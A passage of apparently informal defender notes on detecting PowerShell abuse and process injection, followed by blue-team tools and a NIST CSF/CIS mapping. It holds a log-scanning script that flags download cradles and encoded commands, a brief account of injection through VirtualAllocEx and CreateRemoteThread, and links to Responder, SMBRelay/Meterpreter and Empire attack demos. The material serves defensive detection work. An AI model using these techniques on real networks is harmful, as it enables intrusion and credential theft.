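        $result = Test-SuspiciousScriptBlock -Text $block
        if ($result.Suspicious) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Indicators = ($result.Indicators -join ',')
                Snippet    = $block.Substring(0, [Math]::Min(120, $block.Length))
            }
        }
    } | Format-Table -AutoSize -Wrap
```

Expect legitimate admin tooling to trigger DownloadCradle on its own; the combination of several indicators in one block, or EncodedCommand from an unexpected parent process (visible in Sysmon event 1), is what merits a closer look.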
For example, an attacker might call VirtualAllocEx to allocate space for malicious code to execute, and then utilize CreateRemoteThread or another API call to execute the malicious code within another application. GetInjectedThreads will retrieve the start address of each active thread, then determine the associated section properties. If there is an observed executable running within this section, it is deemed to be injected. But keep in mind that some legitimate applications perform process injection (and you might also run across an injected thread and alert).
Detect CobaltStrike: https://github.com/JPCERTCC/aa-tools Volatility
Monitor Host and Network activities
Check Referer logs in WebLogin for malicious behavior.
Watch Network access after Phish
If I was an adversary I would use your creds in OWA or VPN to get onto workstations to get a foothold and collect more data…
Password Reuse (HaveIBeenPWND)
Passwords that are easy to guess
https://screencast-o-matic.com/u/vqZ/CrackHashResponder Go to 3:36 minutes into video
https://screencast-o-matic.com/u/vqZ/LLMNR_HTTPCapture Responder running and SMBRelay running with payload and Listener for SMBRelayPayload to launch Meterpreter (1:03 Minutes in).
https://g-laurent.blogspot.com/2017/03/multirelay-20-runas-pivot-svc-and.html?m=1
https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire and see all the modules in Empire and the Agents.
Exploiting Windows network with Responder and MultiRelay: https://www.youtube.com/watch?v=rjRDsXp_MNk
Scripts are great for signatures; how about behaviors?
DetectionLab to perform attacks and build defenses
https://medium.com/@clong/introducing-detection-lab-61db34bed6ae
Other Blue Team Tools are… GRR, Kansa, HELK
Or just build a noSQL db and dump everything into it and have a data scientist build queries/db
Mandiant MIR, etc
Turn off LLMNR to stop Responder attack
Free Tools to Review/Monitor/Log: MSFT Sysinternals: Sysmon, built-in Windows Audit logs, cmd line auditing, and PowerShell, Registry Monitoring (turn on)
My Wiki: https://wiki.cac.washington.edu/display/~moorej1@washington.edu/IR+Sandbox+Powershell+Obfuscation+and+Detection+Techniques
PowerShell v5 Security Enhancements & AD Security https://adsecurity.org/?p=2277
Ask your vendor for best practices or free tools that come with contract such as ATP
BloodHound Map AD https://github.com/BloodHoundAD/BloodHound
MSFT cloud https://cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/
https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
RegMon: http://leelusoft.altervista.org/registry-live-watch.html
https://sourceforge.net/projects/regshot/
The team should have a mission and a plan that guide it toward what is important to the business. It could implement the Cybersecurity Framework, or map the CIS Controls (the core of NIST) to objectives. Map those to tickets to track events related to controls for later analysis.
Cybersecurity Framework (CSF) Core: Identify, Protect, Detect, Respond, Recover
For an example of Detection Response team mappings:
Protect: CIS 3, Secure Configuration of End-User Devices
Detect: CIS 4, Continuous Vulnerability Assessment & Remediation
Respond: CIS 6, Maintenance, Monitoring, and Analysis of Audit Logs